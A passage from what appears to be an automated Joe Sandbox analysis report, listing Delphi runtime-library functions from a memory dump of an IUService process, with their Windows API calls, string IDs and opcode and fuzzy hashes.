                                                                                                                                            • @Sysutils@GetLocaleChar$qqriib.RTL120(?,:mm:ss,?,?,?,:mm,?,?,?,00000001,00000000,5002933E), ref: 5002931A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$String$Sysutils@$Locale$System@@$Asg$qqrr20Stringx20$Str$qqriix20$Def$qqrx20Stringi$Char$qqriib$FreeInfoMem$qqrpvN$qqrv$CharFromLen$qqrr20Long$qqrx20Move$qqrpxvpviString$qqriStringpbiStringriThreadValid
                                                                                                                                            • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                                                            • API String ID: 1591733115-2493093252
                                                                                                                                            • Opcode ID: d39b3aeaf06a43d5e51a57cb72a8f0b0344bee30f2a786df34325c6a8d5a2eb3
                                                                                                                                            • Instruction ID: c56b8177db0a57ba453c3af60c07cd0ceb7fdab362b64694d1a226fae421d36e
                                                                                                                                            • Opcode Fuzzy Hash: d39b3aeaf06a43d5e51a57cb72a8f0b0344bee30f2a786df34325c6a8d5a2eb3
                                                                                                                                            • Instruction Fuzzy Hash: 047158317022CA9BDF01DBE4F891ADEB3BADF98300F908637B105AB656D635DD058794
                                                                                                                                            Function 50026004 Relevance: 52.7, APIs: 27, Strings: 3, Instructions: 177threadCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 50026036
                                                                                                                                            • GetThreadLocale.KERNEL32(?,00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 5002603F
                                                                                                                                            • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 5002604E
                                                                                                                                              • Part of subcall function 50025B78: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 50025B96
                                                                                                                                              • Part of subcall function 50025B78: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(?,?,?,00000100), ref: 50025BAA
                                                                                                                                            • @Sysutils@StrToIntDef$qqrx20System@UnicodeStringi.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 5002605B
                                                                                                                                              • Part of subcall function 5001B4C8: @System@@ValLong$qqrx20System@UnicodeStringri.RTL120(?,00000001,50025F1B,00000000,50025F3D,?,?,?,00000000), ref: 5001B4CE
                                                                                                                                            • @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 500260A5
                                                                                                                                            • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 500260AF
                                                                                                                                            • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 500260B8
                                                                                                                                            • @System@@UStrLen$qqrx20System@UnicodeString.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 500260BD
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 500260D0
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 500260F2
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @Sysutils@CharLength$qqrx20System@UnicodeStringi.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 50026110
                                                                                                                                            • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 5002612B
                                                                                                                                            • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 50026135
                                                                                                                                            • @Sysutils@StrLIComp$qqrpxbt1ui.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 50026153
                                                                                                                                            • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 50026163
                                                                                                                                            • @Sysutils@StrLIComp$qqrpxbt1ui.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 5002617F
                                                                                                                                            • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 5002618F
                                                                                                                                              • Part of subcall function 5000A164: @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120 ref: 5000A18D
                                                                                                                                              • Part of subcall function 5000A164: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000), ref: 5000A1A4
                                                                                                                                              • Part of subcall function 5000A164: @System@Move$qqrpxvpvi.RTL120(00000000), ref: 5000A1B7
                                                                                                                                              • Part of subcall function 5000A164: @System@@LStrClr$qqrpv.RTL120(00000000), ref: 5000A1C4
                                                                                                                                            • @Sysutils@StrLIComp$qqrpxbt1ui.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 500261AA
                                                                                                                                            • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 500261BA
                                                                                                                                            • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 50026202
                                                                                                                                            • @System@@UStrLen$qqrx20System@UnicodeString.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 50026207
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Unicode$System@$System@@$String$Stringx20$Sysutils@$Cat$qqrr20$From$Asg$qqrr20Comp$qqrpxbt1uiLocaleStringi$AnsiCharEnsureLen$qqrx20Str$qqrr20String$qqrr20Stringx27System@%T$us$i0$%$Char$qqrr20Clr$qqrpvCopy$qqrx20Def$qqrx20InfoInternalLen$qqrr20Length$qqrr20Length$qqrx20Long$qqrx20Move$qqrpxvpviStr$qqriix20StringbStringiiStringpbiStringriThread
                                                                                                                                            • String ID: eeee$ggg$yyyy
                                                                                                                                            • API String ID: 1621705807-1253427255
                                                                                                                                            • Opcode ID: 1884aa2f990ab26dba5cc17f667b94dca3a286d4ccce1ce422f9c0f14f277c91
                                                                                                                                            • Instruction ID: 4996f8794606f03fae622fcb1ff33eb4fce06e18e571e892f00786f695fe8f9d
                                                                                                                                            • Opcode Fuzzy Hash: 1884aa2f990ab26dba5cc17f667b94dca3a286d4ccce1ce422f9c0f14f277c91
                                                                                                                                            • Instruction Fuzzy Hash: 6A51C234A021CBCBDB10DBE8E9925EEB3A5EF91300F644363A500D7362DB74EE159791
                                                                                                                                            Function 5002E9E8 Relevance: 49.1, APIs: 25, Strings: 3, Instructions: 88COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @Sysutils@FreeAndNil$qqrpv.RTL120(00000000,5002EB85), ref: 5002EA0A
                                                                                                                                              • Part of subcall function 5002B124: @System@TObject@Free$qqrv.RTL120(5002EA0F,00000000,5002EB85), ref: 5002B12C
                                                                                                                                            • @Sysutils@TEncoding@FreeEncodings$qqrv.RTL120(00000000,5002EB85), ref: 5002EA14
                                                                                                                                              • Part of subcall function 5002D28C: @System@TObject@Free$qqrv.RTL120(5002EA19,00000000,5002EB85), ref: 5002D299
                                                                                                                                              • Part of subcall function 5002D28C: @System@TObject@Free$qqrv.RTL120(5002EA19,00000000,5002EB85), ref: 5002D2AB
                                                                                                                                              • Part of subcall function 5002D28C: @System@TObject@Free$qqrv.RTL120(5002EA19,00000000,5002EB85), ref: 5002D2BD
                                                                                                                                              • Part of subcall function 5002D28C: @System@TObject@Free$qqrv.RTL120(5002EA19,00000000,5002EB85), ref: 5002D2CF
                                                                                                                                              • Part of subcall function 5002D28C: @System@TObject@Free$qqrv.RTL120(5002EA19,00000000,5002EB85), ref: 5002D2E1
                                                                                                                                              • Part of subcall function 5002D28C: @System@TObject@Free$qqrv.RTL120(5002EA19,00000000,5002EB85), ref: 5002D2F3
                                                                                                                                            • @System@RemoveModuleUnloadProc$qqrpqqrui$v.RTL120(00000000,5002EB85), ref: 5002EA1E
                                                                                                                                              • Part of subcall function 5000C94C: @System@@FreeMem$qqrpv.RTL120(?,?,?,?,5000C929), ref: 5000C976
                                                                                                                                              • Part of subcall function 5002B720: @System@@Dispose$qqrpvt1.RTL120(?,5002EA28,00000000,5002EB85), ref: 5002B73C
                                                                                                                                              • Part of subcall function 500274D8: InterlockedExchange.KERNEL32(500A6DBC,00000000), ref: 500274E1
                                                                                                                                              • Part of subcall function 500274D8: InterlockedExchange.KERNEL32(500A6DC0,00000000), ref: 500274F3
                                                                                                                                              • Part of subcall function 50027254: @System@TObject@Free$qqrv.RTL120(?,?,5002EA37,00000000,5002EB85), ref: 5002728E
                                                                                                                                              • Part of subcall function 50027254: @System@ExceptObject$qqrv.RTL120(5002EA37,00000000,5002EB85), ref: 500272D0
                                                                                                                                              • Part of subcall function 50027254: @System@ExceptObject$qqrv.RTL120(5002EA37,00000000,5002EB85), ref: 500272D9
                                                                                                                                              • Part of subcall function 50027254: @System@@IsClass$qqrp14System@TObjectp17System@TMetaClass.RTL120(5002EA37,00000000,5002EB85), ref: 500272E4
                                                                                                                                              • Part of subcall function 50027254: @System@ExceptAddr$qqrv.RTL120(5002EA37,00000000,5002EB85), ref: 500272ED
                                                                                                                                              • Part of subcall function 50027254: @System@ExceptObject$qqrv.RTL120(00000000,5002EA37,00000000,5002EB85), ref: 500272F3
                                                                                                                                            • @System@@WStrClr$qqrpv.RTL120(00000000,5002EB85), ref: 5002EA46
                                                                                                                                              • Part of subcall function 50009588: SysFreeString.OLEAUT32(?), ref: 50009596
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(00000000,5002EB85), ref: 5002EA50
                                                                                                                                              • Part of subcall function 500087A8: @System@@FreeMem$qqrpv.RTL120(?,50004445,5000444D), ref: 500087C4
                                                                                                                                            • @System@@FinalizeArray$qqrpvt1ui.RTL120(00000000,5002EB85), ref: 5002EAB5
                                                                                                                                            • @System@@FinalizeArray$qqrpvt1ui.RTL120(00000000,5002EB85), ref: 5002EACA
                                                                                                                                              • Part of subcall function 5000AF28: @System@@LStrClr$qqrpv.RTL120(?,?,?,?,5000AF01,?,?,?,50006C67,?,?,50006BAA), ref: 5000AF7A
                                                                                                                                            • @System@@FinalizeArray$qqrpvt1ui.RTL120(00000000,5002EB85), ref: 5002EADF
                                                                                                                                              • Part of subcall function 5000AF28: @System@@LStrArrayClr$qqrpvi.RTL120(?,?,?,?,5000AF01,?,?,?,50006C67,?,?,50006BAA), ref: 5000AF86
                                                                                                                                            • @System@@FinalizeArray$qqrpvt1ui.RTL120(00000000,5002EB85), ref: 5002EAF4
                                                                                                                                              • Part of subcall function 5000AF28: @System@@WStrClr$qqrpv.RTL120(?,?,?,?,5000AF01,?,?,?,50006C67,?,?,50006BAA), ref: 5000AF97
                                                                                                                                            • @System@@FinalizeArray$qqrpvt1ui.RTL120(00000000,5002EB85), ref: 5002EB09
                                                                                                                                              • Part of subcall function 5000AF28: @System@@WStrArrayClr$qqrpvi.RTL120(?,?,?,?,5000AF01,?,?,?,50006C67,?,?,50006BAA), ref: 5000AFA3
                                                                                                                                            • @System@@DynArrayClear$qqrrpvpv.RTL120(00000000,5002EB85), ref: 5002EB19
                                                                                                                                              • Part of subcall function 5000C214: @System@@FinalizeArray$qqrpvt1ui.RTL120(?,5000B022,?,?,?,?,5000AF01,?,?,?,50006C67,?,?,50006BAA), ref: 5000C23F
                                                                                                                                              • Part of subcall function 5000C214: @System@@FreeMem$qqrpv.RTL120(?,5000B022,?,?,?,?,5000AF01,?,?,?,50006C67,?,?,50006BAA), ref: 5000C247
                                                                                                                                            • @System@@DynArrayClear$qqrrpvpv.RTL120(00000000,5002EB85), ref: 5002EB29
                                                                                                                                            • @System@@FinalizeArray$qqrpvt1ui.RTL120(00000000,5002EB85), ref: 5002EB48
                                                                                                                                            • @System@@FinalizeArray$qqrpvt1ui.RTL120(00000000,5002EB85), ref: 5002EB5D
                                                                                                                                            • @System@@FinalizeArray$qqrpvt1ui.RTL120(00000000,5002EB85), ref: 5002EB72
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$System@$Array$qqrpvt1uiFinalize$Free$qqrvObject@$Free$ArrayClr$qqrpvExcept$Mem$qqrpvObject$qqrv$Clear$qqrrpvpvClr$qqrpviExchangeInterlockedSysutils@$Addr$qqrvClassClass$qqrp14Dispose$qqrpvt1Encoding@Encodings$qqrvMetaModuleNil$qqrpvObjectp17Proc$qqrpqqrui$vRemoveStringUnload
                                                                                                                                            • String ID: ,lP$XlP$kP
                                                                                                                                            • API String ID: 2770033941-639665064
                                                                                                                                            • Opcode ID: f23baf51e28d9a27ceff879c9aaca5bdc4a02411ffc7946e290e9f0f5d05e065
                                                                                                                                            • Instruction ID: 458439708314837829a00875a32db1e9822d01f5b0deb47506a78c5581f45b3e
                                                                                                                                            • Opcode Fuzzy Hash: f23baf51e28d9a27ceff879c9aaca5bdc4a02411ffc7946e290e9f0f5d05e065
                                                                                                                                            • Instruction Fuzzy Hash: 3431F0203570C147F714ABE8F82266A3221DFA1751FD08B27F1009B792CA29DD4297E2
                                                                                                                                            Function 50030A88 Relevance: 48.2, APIs: 32, Instructions: 152windowCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,50030CCD,?,?,00000000,00000000), ref: 50030B29
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrx20System@UnicodeString.RTL120(00000000,50030CCD,?,?,00000000,00000000), ref: 50030B38
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,50030CCD,?,?,00000000,00000000), ref: 50030B3D
                                                                                                                                            • @Variants@VarInvalidOp$qqrv.RTL120(00000000,50030CCD,?,?,00000000,00000000), ref: 50030B47
                                                                                                                                            • @Sysutils@SysErrorMessage$qqrui.RTL120(?,?,?,?,?,?,?,00000000,50030CCD,?,?,00000000,00000000), ref: 50030C6F
                                                                                                                                            • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000002,?,?,?,?,?,?,?,?,00000000,50030CCD,?,?,00000000,00000000), ref: 50030C8C
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000002,?,?,?,?,?,?,?,?,00000000,50030CCD,?,?,00000000,00000000), ref: 50030C9B
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000002,?,?,?,?,?,?,?,?,00000000,50030CCD,?,?,00000000,00000000), ref: 50030CA0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$StringSysutils@$Except$qqrvException@$bctr$qqrx20LoadRaiseString$qqrp20System@@Unicode$ErrorInvalidMessage$qqruiOp$qqrvRecxiStringpx14Variants@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 770543886-0
                                                                                                                                            • Opcode ID: a1282365be09462d89120203df3854cda1f43aef0eed8fd7da0b363bcbf0933f
                                                                                                                                            • Instruction ID: f96400911d13d964e0fb64cf20edc1743dca0574da95ff12fd542a95d4d1681a
                                                                                                                                            • Opcode Fuzzy Hash: a1282365be09462d89120203df3854cda1f43aef0eed8fd7da0b363bcbf0933f
                                                                                                                                            • Instruction Fuzzy Hash: B15183345035C9CFEF21DBE4EDA29EEB3B1AF24204F504326F90097666CB75AD059BA1
                                                                                                                                            Function 5002A000 Relevance: 44.1, APIs: 23, Strings: 2, Instructions: 309COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 50029E40: FindResourceW.KERNEL32(?,PACKAGEINFO,0000000A), ref: 50029E56
                                                                                                                                              • Part of subcall function 50029E40: LoadResource.KERNEL32(?,00000000,?,PACKAGEINFO,0000000A), ref: 50029E61
                                                                                                                                              • Part of subcall function 50029E40: LockResource.KERNEL32(00000000,00000000,50029EA0,?,?,00000000,?,PACKAGEINFO,0000000A), ref: 50029E81
                                                                                                                                              • Part of subcall function 50029E40: FreeResource.KERNEL32(00000000,50029EA7,?,?,00000000,?,PACKAGEINFO,0000000A), ref: 50029E9A
                                                                                                                                            • @Sysutils@GetModuleName$qqrui.RTL120(00000000,5002A3C8), ref: 5002A0CB
                                                                                                                                            • @Sysutils@ExtractFileName$qqrx20System@UnicodeString.RTL120(00000000,5002A3C8), ref: 5002A0D6
                                                                                                                                            • @Sysutils@ChangeFileExt$qqrx20System@UnicodeStringt1.RTL120(00000000,5002A3C8), ref: 5002A0E3
                                                                                                                                            • @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,5002A3C8), ref: 5002A0F3
                                                                                                                                            • @System@UTF8ToString$qqrpxcxi.RTL120(00000000,00000000,5002A3C8), ref: 5002A121
                                                                                                                                            • @Sysutils@ChangeFileExt$qqrx20System@UnicodeStringt1.RTL120(00000000,00000000,5002A3C8), ref: 5002A131
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,00000000,5002A3C8), ref: 5002A139
                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,00000000,00000000,5002A3C8), ref: 5002A13F
                                                                                                                                            • @Sysutils@StrLen$qqrpxc.RTL120(00000000,00000000,5002A3C8), ref: 5002A14D
                                                                                                                                            • @System@@New$qqripv.RTL120(00000000,5002A3C8), ref: 5002A17A
                                                                                                                                            • @System@@DynArraySetLength$qqrv.RTL120(?,00000000,5002A3C8), ref: 5002A1B6
                                                                                                                                            • @Sysutils@HashName$qqrpc.RTL120 ref: 5002A1C6
                                                                                                                                            • @Sysutils@HashName$qqrpc.RTL120 ref: 5002A1E1
                                                                                                                                              • Part of subcall function 50029CF0: @System@@PCharLen$qqrpc.RTL120(?,?,00000000,?,5002A1CB), ref: 50029C6A
                                                                                                                                              • Part of subcall function 50029CF0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,5002A1CB), ref: 50029C7E
                                                                                                                                              • Part of subcall function 50029CF0: @System@@GetMem$qqri.RTL120(0000FDE9,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,5002A1CB), ref: 50029C91
                                                                                                                                              • Part of subcall function 50029CF0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,00000000,?,00000000,0000FDE9,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?), ref: 50029CA7
                                                                                                                                              • Part of subcall function 50029CF0: CharUpperBuffW.USER32(?,00000000,0000FDE9,00000000,00000000,00000000,?,00000000,0000FDE9,00000000,00000000,00000000,00000000,00000000), ref: 50029CAE
                                                                                                                                              • Part of subcall function 50029CF0: @System@@FreeMem$qqrpv.RTL120(?,00000000,0000FDE9,00000000,00000000,00000000,?,00000000,0000FDE9,00000000,00000000,00000000,00000000,00000000), ref: 50029CDD
                                                                                                                                            • @Sysutils@StrIComp$qqrpxct1.RTL120 ref: 5002A201
                                                                                                                                            • @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,00000000,500A7DBC,00000000), ref: 5002A27E
                                                                                                                                            • @System@UTF8ToString$qqrpxcxi.RTL120(00000000,00000000,500A7DBC,00000000), ref: 5002A29B
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000002,?,00000000,00000000,500A7DBC,00000000), ref: 5002A2C7
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000002,?,00000000,00000000,500A7DBC,00000000), ref: 5002A2CC
                                                                                                                                            • @Sysutils@StrLen$qqrpxc.RTL120 ref: 5002A37E
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(5002A3CF), ref: 5002A3BA
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@System@@Sysutils@$Unicode$String$CharResource$File$AnsiByteChangeExt$qqrx20FreeFromHashLen$qqrpxcModuleMultiName$qqrpcString$qqrpxcxiStringt1System@%Wide$ArrayBuffChar$qqrx20Clr$qqrpvComp$qqrpxct1Except$qqrvException@$bctr$qqrp20ExtractFindHandleLen$qqrpcLength$qqrvLoadLockMem$qqriMem$qqrpvName$qqruiName$qqrx20New$qqripvRaiseRecpx14RecxiStr$qqrr20Str$qqrr27StringusStringx27T$us$i0$%T$us$i0$%x20Upper
                                                                                                                                            • String ID: .bpl$SysInit
                                                                                                                                            • API String ID: 832494849-1949293470
                                                                                                                                            • Opcode ID: 80d2e90f927725b8c34378fd1ad348739718c56a093d0ac4d107abcea30af493
                                                                                                                                            • Instruction ID: 837392768b698e741bc70171f0b158cd4f4db25f9bd6245715707dd2a9ab8d4f
                                                                                                                                            • Opcode Fuzzy Hash: 80d2e90f927725b8c34378fd1ad348739718c56a093d0ac4d107abcea30af493
                                                                                                                                            • Instruction Fuzzy Hash: 88D13C74E0129A9FDB10CF98D880ADEB7F5FF59304F10866AE554AB351DB30AE45CB90
                                                                                                                                            Function 500248EC Relevance: 44.0, APIs: 24, Strings: 1, Instructions: 263timeCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 500246E0: @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,50024767), ref: 50024741
                                                                                                                                              • Part of subcall function 500246E0: @System@@UStrLen$qqrx20System@UnicodeString.RTL120(00000000,50024767), ref: 50024746
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50024C6D), ref: 50024968
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,50024C6D), ref: 5002498C
